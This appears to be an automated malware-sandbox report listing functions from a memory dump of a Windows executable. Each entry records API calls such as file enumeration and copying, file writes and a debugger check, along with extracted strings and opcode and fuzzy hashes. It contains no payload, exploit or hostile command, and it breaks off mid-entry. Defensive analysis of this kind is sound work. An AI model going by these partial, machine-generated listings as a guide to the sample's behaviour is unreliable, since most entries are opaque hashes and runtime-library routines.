Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: 0@$bad allocation
API String ID: 615853336-2209917534
Opcode ID: 4309afd4dad9414781cd96fcdb960240d0bff31a02817935b0c99f8053a46b09
Instruction ID: 5f910f076aba495b1363e4e43b336b3926accce1d0f97d194d05b5e0620794ad
Opcode Fuzzy Hash: 4309afd4dad9414781cd96fcdb960240d0bff31a02817935b0c99f8053a46b09
Instruction Fuzzy Hash: 1CF0D175D002096ACF14FF59DC02AAD7FA8AF42358F15407FE442A62D5DB7C8A04875D

Uniqueness

Uniqueness Score: -1.00%

Function 0049F7B5, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0049F7C3

Part of subcall function 0049F64E: __FF_MSGBANNER.LIBCMT ref: 0049F667
Part of subcall function 0049F64E: __NMSG_WRITE.LIBCMT ref: 0049F66E
Part of subcall function 0049F64E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A212E,00000000,00000001,00000000,?,004A8BC4,00000018,004D18E0,0000000C,004A8C54), ref: 0049F693

_free.LIBCMT ref: 0049F7D6

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 7b6f1459b126053baa7550d5993970b424c819cc00c4c108be30cbcd5d464693
Instruction ID: ac89796c405cd9b19e999576c6f493610811934c48870559c4c20306057a7d06
Opcode Fuzzy Hash: 7b6f1459b126053baa7550d5993970b424c819cc00c4c108be30cbcd5d464693
Instruction Fuzzy Hash: 78113632400601ABCF617FB9AC04A5B3F94AF663B4F20857BF844D6261FB3CC945869D

Uniqueness

Uniqueness Score: -1.00%

Function 00403270, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00403309

Part of subcall function 0049D92E: std::exception::_Copy_str.LIBCMT ref: 0049D949

__CxxThrowException@8.LIBCMT ref: 0040331E

Part of subcall function 0049DFF1: RaiseException.KERNEL32(#3@,?,5EBFF6FD,004BD94C,00403323,?,004CDB30,?,5EBFF6FD), ref: 0049E033

Part of subcall function 004031B0: std::exception::exception.LIBCMT ref: 004031E0
Part of subcall function 004031B0: __CxxThrowException@8.LIBCMT ref: 004031F7

_memmove.LIBCMT ref: 00403365

Strings

0@, xrefs: 00403317

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID: 0@
API String ID: 163498487-1855383697
Opcode ID: 8ac2840229926167183ff3cea8f3402102301635fda73545f26d82ac78596569
Instruction ID: cf26965e1ee7b1b309dd451f3e6891717da3729834d1bb6365a30e0f322bff61
Opcode Fuzzy Hash: 8ac2840229926167183ff3cea8f3402102301635fda73545f26d82ac78596569
Instruction Fuzzy Hash: 2041B671D00605ABCB14DFA9C48169EBFF8EB05320F50427FE826A77C1D778AA40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00415810, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041581B
_strcpy_s.LIBCMT ref: 00415832
_memset.LIBCMT ref: 00415851

Strings

1BEF0A57BE110FD467A, xrefs: 00415824

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: 98e0d5a782ed8e63c396c1782a8dc748c04133c8203c08e40caa6bddca54faf9
Instruction ID: af2dadfeaf9b0eed6c2869de332243dfeb03c4e069caabdb58d934c26cdb9d2d
Opcode Fuzzy Hash: 98e0d5a782ed8e63c396c1782a8dc748c04133c8203c08e40caa6bddca54faf9
Instruction Fuzzy Hash: 1EF03170A457009FD764DF59D941B4BBBE0BF89700F408D1EF58A97791D778E8008B59

Uniqueness

Uniqueness Score: -1.00%

Function 00403860, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004038D4
_memmove.LIBCMT ref: 00403923

Part of subcall function 00403640: std::_Xinvalid_argument.LIBCPMT ref: 0040365A

Strings

string too long, xrefs: 004038CF

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: c1575863738b1f77933bd0b6b218f6ad78db3a2c7ac02fd5674dd8d3df5af7c5
Instruction ID: 8aa56a044073ab7c9b23e23ea00be2b4dc66f39c76170815ba05e67864a78097
Opcode Fuzzy Hash: c1575863738b1f77933bd0b6b218f6ad78db3a2c7ac02fd5674dd8d3df5af7c5
Instruction Fuzzy Hash: CD3107727106104BD734AE5D988091BEBEDEF92752B20497FF081D73C0C3789D4483A9

Uniqueness

Uniqueness Score: -1.00%

Function 004031B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 004031E0
__CxxThrowException@8.LIBCMT ref: 004031F7

Part of subcall function 0049DF71: _malloc.LIBCMT ref: 0049DF8B

Strings

0@, xrefs: 004031EF

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0@
API String ID: 4063778783-1855383697
Opcode ID: 31b64dfb0df5930320fdb9a870ead79ffd9cd5641bf4ace79d2e25b2185ffe81
Instruction ID: abeb7ace0579a2a15c5adc9fd3031873d0b028a98323f2121a96f3875d34b464
Opcode Fuzzy Hash: 31b64dfb0df5930320fdb9a870ead79ffd9cd5641bf4ace79d2e25b2185ffe81
Instruction Fuzzy Hash: 8CE022B58143016AC718EF249952B6F7AD89F94704F004A3EF80A412C0FB38CA0C966B

Uniqueness

Uniqueness Score: -1.00%

Function 0049D18D, Relevance: 4.6, APIs: 3, Instructions: 74COMMON

Download Yara Rule

APIs

std::_Xfsopen.LIBCPMT ref: 0049D145
std::_Xfsopen.LIBCPMT ref: 0049D161
_fseek.LIBCMT ref: 0049D178

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xfsopenstd::_$_fseek
String ID:
API String ID: 1675860589-0
Opcode ID: 10f1ee01e07881ea2d46741451dd7761808d0bc146aa0f273167893734abe8f7
Instruction ID: 2785a761bfd7b2d0e5123480086bff05119a836f05b90d85921d6fabc2e1aa54
Opcode Fuzzy Hash: 10f1ee01e07881ea2d46741451dd7761808d0bc146aa0f273167893734abe8f7
Instruction Fuzzy Hash: 6A110233E0121567EF2449659C03B7B7F99AB10794F184036FF85923A1EA2DDC12C29E

Uniqueness

Uniqueness Score: -1.00%

Function 00415A90, Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,76D681D0,0040552C,?,00000000), ref: 00415AB7
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00415AE3
CloseHandle.KERNEL32(00000000), ref: 00415AEA

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 25daf1d190191064318a12b665ba9fc535bab38e76703f9b3b4242f8d120905d
Instruction ID: 4fd37a0f0d45f11085e0c41737c63e4162d3c1bb5a4848d1b934220260a523ec
Opcode Fuzzy Hash: 25daf1d190191064318a12b665ba9fc535bab38e76703f9b3b4242f8d120905d
Instruction Fuzzy Hash: 75F0A472254610BBE310DA1CDC48FD772A8BB98724F044726F200961C0C7F4A891C799

Uniqueness

Uniqueness Score: -1.00%

Function 00497A30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00497B19

Strings

@~A, xrefs: 00497B12

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: @~A
API String ID: 323602529-1069314476
Opcode ID: 44b1bd3f2967c663c9978d31a34246580ee27cc191bbbea8f351652b1acb05fe
Instruction ID: b1b9fe866f57863e1257f426dabcbc18426592e8730c175ee8372cc84a2ee3a6
Opcode Fuzzy Hash: 44b1bd3f2967c663c9978d31a34246580ee27cc191bbbea8f351652b1acb05fe
Instruction Fuzzy Hash: 4431D471A04304DFDF10DF95C841B8ABBB8EB05714F10447AE809A7281EB79AA48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0049A500, Relevance: 3.1, APIs: 2, Instructions: 70fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0049A538
ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,0049A639,?,00004000,?,00000000,?,00000000,0049C395), ref: 0049A578

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: 025aab1665f235f50434907450d4cd4b0a422ac3fb8ed75a025b1a572c154767
Instruction ID: f19ab67a23db457322ae49a2c48aa69833422f296cd1bf756758d93bac3212c2
Opcode Fuzzy Hash: 025aab1665f235f50434907450d4cd4b0a422ac3fb8ed75a025b1a572c154767
Instruction Fuzzy Hash: 47116072700701AFE720EE6AE884E5BBBE9EBC4754F14482EF295C3211D630EC188775

Uniqueness

Uniqueness Score: -1.00%

Function 0049AF00, Relevance: 3.1, APIs: 2, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,00000000,0049BDEC,?,00000000,00000000,00000010,00000000), ref: 0049AF44

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ffaccb4036cd84680074d819fe71209facf0df52f90c216d3950244efedeed91
Instruction ID: 9b4b99e58a47119ea58b2c04b46bb5819a478bda6977f39b3fdc0b5471ef1dc0
Opcode Fuzzy Hash: ffaccb4036cd84680074d819fe71209facf0df52f90c216d3950244efedeed91
Instruction Fuzzy Hash: 08018CB22057046BD720AE7DA8C4BA7FBDCE799325F10863FF255C2250C77158548669

Uniqueness

Uniqueness Score: -1.00%

Function 00418310, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 004181E3
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 0041820C
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 0041822B
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 0041824D
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 0041826C
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 00418289
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 004182A8

Part of subcall function 0049DF71: _malloc.LIBCMT ref: 0049DF8B

std::locale::_Init.LIBCPMT ref: 00418356

Part of subcall function 0049CE2D: __EH_prolog3.LIBCMT ref: 0049CE34
Part of subcall function 0049CE2D: std::_Lockit::_Lockit.LIBCPMT ref: 0049CE4A
Part of subcall function 0049CE2D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0049CE6C
Part of subcall function 0049CE2D: std::locale::_Setgloballocale.LIBCPMT ref: 0049CE76
Part of subcall function 0049CE2D: _Yarn.LIBCPMT ref: 0049CE8C

std::_Lockit::_Lockit.LIBCPMT ref: 00418369

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exceptionstd::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
String ID:
API String ID: 353226162-0
Opcode ID: 5cacca039a4dadc7a0a35e753ad94f3706be595044952603114c363de905e733
Instruction ID: 76e9e2ebb8edf330e122527bd73bd9533cd1b70163d10d6539d9ba5782d1f94e
Opcode Fuzzy Hash: 5cacca039a4dadc7a0a35e753ad94f3706be595044952603114c363de905e733
Instruction Fuzzy Hash: 78018BB19007009FD720AF6AD881597FBE8FFD0724B100B2FE55687A51DBB5A4058B54

Uniqueness

Uniqueness Score: -1.00%

Function 0049E48E, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 004A3E4D: __getptd_noexit.LIBCMT ref: 004A3E4D

__lock_file.LIBCMT ref: 0049E4D5

Part of subcall function 0049FEF1: __lock.LIBCMT ref: 0049FF16

__fclose_nolock.LIBCMT ref: 0049E4E0

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 8e856336e8a084bc4dc0f526950b45990c407cd33d20c1fdcc2ce0532f7a2f91
Instruction ID: 3a1edaafd0bd9f2c9e831fb26050a82f8b9af1d20e61d8937aedc674d508028c
Opcode Fuzzy Hash: 8e856336e8a084bc4dc0f526950b45990c407cd33d20c1fdcc2ce0532f7a2f91
Instruction Fuzzy Hash: 37F096308017159ADF10EB7788027AF7FA06F52739F20872FA4349A1D2C77C99025B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004A79F3, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004A7A0B

Part of subcall function 004A8C39: __mtinitlocknum.LIBCMT ref: 004A8C4F
Part of subcall function 004A8C39: __amsg_exit.LIBCMT ref: 004A8C5B
Part of subcall function 004A8C39: EnterCriticalSection.KERNEL32(00000000,00000000,?,004A63FA,0000000D), ref: 004A8C63

__tzset_nolock.LIBCMT ref: 004A7A1C

Part of subcall function 004A7312: __lock.LIBCMT ref: 004A7334
Part of subcall function 004A7312: ____lc_codepage_func.LIBCMT ref: 004A737B
Part of subcall function 004A7312: __getenv_helper_nolock.LIBCMT ref: 004A739D
Part of subcall function 004A7312: _free.LIBCMT ref: 004A73D4
Part of subcall function 004A7312: _strlen.LIBCMT ref: 004A73DB
Part of subcall function 004A7312: __malloc_crt.LIBCMT ref: 004A73E2
Part of subcall function 004A7312: _strlen.LIBCMT ref: 004A73F8
Part of subcall function 004A7312: _strcpy_s.LIBCMT ref: 004A7406
Part of subcall function 004A7312: __invoke_watson.LIBCMT ref: 004A741B
Part of subcall function 004A7312: _free.LIBCMT ref: 004A742A

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: 7161d2d565d56c85c67f213f70107b968e429cada2a7728a372456dfc926bb8d
Instruction ID: 48eeab3bdcb1a0656f9b4513aa2f6fcb30944b7b31a92dc6f2751c98636f3d6d
Opcode Fuzzy Hash: 7161d2d565d56c85c67f213f70107b968e429cada2a7728a372456dfc926bb8d
Instruction Fuzzy Hash: 4BE08630546610A6C631FFE1BE0224DB360EB7AB65B11415FBD40215D1CE7C1601969D

Uniqueness

Uniqueness Score: -1.00%

Function 033A0DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,033A0223,?,?), ref: 033A0E02
SetErrorMode.KERNEL32(00000000,?,?,033A0223,?,?), ref: 033A0E07

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 33e04afa86802df81a3dad343a0f3017d41d6beb605d32ef60843ea49103aa03
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 59D0123224562CB7DB002A98DC09BCEBB5CDF05BA6F048021FB0DE9181CBB09A4046EA

Uniqueness

Uniqueness Score: -1.00%

Function 004AC9F6, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004A2178,00000000,?,00000000,00000000,00000000,?,004A648F,00000001,00000214,?,?), ref: 004ACA39

Part of subcall function 004A3E4D: __getptd_noexit.LIBCMT ref: 004A3E4D

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 501e4206fdba02729c64dfe2b7a80c5ad6c698e1f22893a724a88b541e30f980
Instruction ID: 38a36a1555dd935487017109e963bec6164543c948d2b4592ff8ec1f2ecf5e07
Opcode Fuzzy Hash: 501e4206fdba02729c64dfe2b7a80c5ad6c698e1f22893a724a88b541e30f980
Instruction Fuzzy Hash: 530188313516199BEF65DF75DC84B7B3754AB63760F05862BE815CA2A0EB38D800C758

Uniqueness

Uniqueness Score: -1.00%

Function 0049DEFA, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: e40f310ff468136f45b015bdf5cf3bee885033a670374b8e8f36af965187d8f6
Instruction ID: 131b54a9649bf32379ddd76c391a0b16c9136cb5474601f0d193091f4c278188
Opcode Fuzzy Hash: e40f310ff468136f45b015bdf5cf3bee885033a670374b8e8f36af965187d8f6
Instruction Fuzzy Hash: F1F0CD31C006099ACF112FA5CC027AF3F549F66775F04065BFA394A2D1D77D8560D769

Uniqueness

Uniqueness Score: -1.00%

Function 0049A100, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43fb3448b299f2e6bd7934861fc8b6a95c8042ad066a987b50e6c246ed579040
Instruction ID: cf518aa630f8427b97fda3accb432d59dda75789e15a3e1528fe7f1a73e64601
Opcode Fuzzy Hash: 43fb3448b299f2e6bd7934861fc8b6a95c8042ad066a987b50e6c246ed579040
Instruction Fuzzy Hash: 0AF030F1100200ABDF14CF10DA4AB577BE1AB61708F2090AED1444F242C736D827DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004A56B6, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__flsbuf.LIBCMT ref: 004A56D7

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: 74cd47ac6fb0723d7d3e03eac6f64036d1b68aa91d6a01be8d7637940265b0f4
Instruction ID: 3668830b2f07000947d78665f9ef98e25981679dc8e0dac2abba4c36ea69b32e
Opcode Fuzzy Hash: 74cd47ac6fb0723d7d3e03eac6f64036d1b68aa91d6a01be8d7637940265b0f4
Instruction Fuzzy Hash: 89E04870005D009ED7254B34D1452767BA4DF63719F7486CFD9984D1E3C73E9447DA14

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32 ref: 00403C0B

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 20c204d4e8a812031be85ea81137f4415d7f2cb10a5f762785e0a06a67482899
Instruction ID: b0fd882e4121373a3e1eb47b6168d62ef7a6ec1c8e6686f26a47733dfbb8d39d
Opcode Fuzzy Hash: 20c204d4e8a812031be85ea81137f4415d7f2cb10a5f762785e0a06a67482899
Instruction Fuzzy Hash: E5E07EB090C3029FD348DF29D48161BBAF5AF9C304F40897EE198C3350E37586988B9B

Uniqueness

Uniqueness Score: -1.00%

Function 004946D0, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00407334,00000000), ref: 004946D5

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5320be57cfcf512f456c091791c150fe4fe1ab9e031bf9e1046459145fc3a987
Instruction ID: d4e46d43f1bc0760ae5bb194412188fc8bb28d4df6d21ee0f41a2befcac0ead1
Opcode Fuzzy Hash: 5320be57cfcf512f456c091791c150fe4fe1ab9e031bf9e1046459145fc3a987
Instruction Fuzzy Hash: 8BC012F91011000ADA0096A8C91CA0B76A8ABA2321F408A32F260C21D0C63C8C22C218

Uniqueness

Uniqueness Score: -1.00%

Function 0049E6CC, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 0049E6D9

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: 2e016bf839950469df8015b9ab316d63af32a06e2a7c5ec71f324ba501de37c3
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: 68C092B244021C77CF122A83EC0AE4A3F1A9BD0764F458021FB1C19161AA77EA619689

Uniqueness

Uniqueness Score: -1.00%

Function 0049F79E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 0049F7AB

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 2bd31af1ee16c995b108ecb401bfdfc126d185d3201680f2df34f542700eda0d
Instruction ID: 14673e9354f1c4bea41017d8d0d22d6f9f3f15da7a2e3b8147c5c7916fe0ac90
Opcode Fuzzy Hash: 2bd31af1ee16c995b108ecb401bfdfc126d185d3201680f2df34f542700eda0d
Instruction Fuzzy Hash: D7C0927384020C77CF112E83EC0AE4A3F1A9BD0764F148032FB1C19171EA7BEA769689

Uniqueness

Uniqueness Score: -1.00%

Function 00401020, Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 0040102C

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: ace2908106f1c20021bdf12c95b019711b9a9d4fc77db039fb46e1947e9ed2d0
Instruction ID: be800b756fb70381ed584143faa06c2f014a4338401811ed2084d2147785cf31
Opcode Fuzzy Hash: ace2908106f1c20021bdf12c95b019711b9a9d4fc77db039fb46e1947e9ed2d0
Instruction Fuzzy Hash: 9401D4312082869FC710CE2C98C4AA7BBD9DF5A304F04406EF9C4D7222D631D80D8755

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00442210, Relevance: 27.4, APIs: 7, Strings: 8, Instructions: 1140COMMON

Download Yara Rule

Strings

-x0, xrefs: 004427C1
-Inf, xrefs: 00442A3B
+, xrefs: 0044284E
0123456789ABCDEF0123456789abcdef, xrefs: 00442736
gfff, xrefs: 00442CD1
+Inf, xrefs: 00442A60
Inf, xrefs: 00442A6C
<, xrefs: 0044268B

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: +$+Inf$-Inf$-x0$0123456789ABCDEF0123456789abcdef$<$Inf$gfff
API String ID: 0-4070976604
Opcode ID: 532c67b719aeebbd1a7c9c06f5c13cd087b6d79a147fbc8dcc6717640f63856e
Instruction ID: 08c0f0aae893104ba8675cdc720874a2fcc356a85e676fe3be6fd909848c7289
Opcode Fuzzy Hash: 532c67b719aeebbd1a7c9c06f5c13cd087b6d79a147fbc8dcc6717640f63856e
Instruction Fuzzy Hash: 07920671A087829BE7128F24C58035BBFE0FB91344F64499EF8C597352E7B9C945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0049BCD0, Relevance: 14.6, APIs: 5, Strings: 3, Instructions: 595COMMON

Download Yara Rule

Strings

in-gdi-devcaps-l1-1-0, xrefs: 0049BD0D
UT, xrefs: 0049C024
/, xrefs: 0049BD9E

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: /$UT$in-gdi-devcaps-l1-1-0
API String ID: 0-3985708853
Opcode ID: b4a741e966dd6a2256289c5a54a269b2cdb0c422aa9b7bc32a5f5f7fbba58dde
Instruction ID: 837058d69da33380edad8a88d1ee1f0bea183d954be1fb9f354d9db15b8ec60f
Opcode Fuzzy Hash: b4a741e966dd6a2256289c5a54a269b2cdb0c422aa9b7bc32a5f5f7fbba58dde
Instruction Fuzzy Hash: 3A32E4716083858FCB24DF25D8806ABBFE5AFD5304F44893EE9C987342D7389945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406C00, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 319fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00406C7C
FindFirstFileA.KERNEL32(?,?), ref: 00406C94
_sprintf.LIBCMT ref: 00406D93
CopyFileA.KERNEL32 ref: 00407047
FindNextFileA.KERNEL32(?,?), ref: 0040709A
FindClose.KERNEL32(?), ref: 004070A9

Strings

%s\*, xrefs: 00406C6B
%s\%s, xrefs: 00406D8D

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$_sprintf$CloseCopyFirstNext
String ID: %s\%s$%s\*
API String ID: 4241711873-2848263008
Opcode ID: b26207c1fa4158e279bd4862f3d17dff78cdfe71b13204251afd04b2cf927a70
Instruction ID: fa87bc4cec280ed55e18b7b65906aa152370560060449da1b4c22cb311bd707b
Opcode Fuzzy Hash: b26207c1fa4158e279bd4862f3d17dff78cdfe71b13204251afd04b2cf927a70
Instruction Fuzzy Hash: C8D16DB190C3809BD730DB65C885BDBBBE9AB85704F444E2EE1CD53241EB799448CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004ADF17, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,004AE554,?,004A282C,?,000000BC,?,00000001,00000000,00000000), ref: 004ADF56
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,004AE554,?,004A282C,?,000000BC,?,00000001,00000000,00000000), ref: 004ADF7F
GetACP.KERNEL32(?,?,004AE554,?,004A282C,?,000000BC,?,00000001,00000000), ref: 004ADF93

Strings

ACP, xrefs: 004ADF26
OCP, xrefs: 004ADF37

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 8c40b96515094ee226d9d8ca6a380f8fd7f47d13b63451fc0d6a4228075fdbcd
Instruction ID: 6fd1faa2978887e00d173b8bf7d7793a77cff21c201144f7d8ac67ee2491ddf2
Opcode Fuzzy Hash: 8c40b96515094ee226d9d8ca6a380f8fd7f47d13b63451fc0d6a4228075fdbcd
Instruction Fuzzy Hash: C001FC75A05246BEEF119B65EC45F9F37A8AF52318F20002BF003E2981FB68DE51965D

Uniqueness

Uniqueness Score: -1.00%

Function 0049D2E0, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004A3FA5
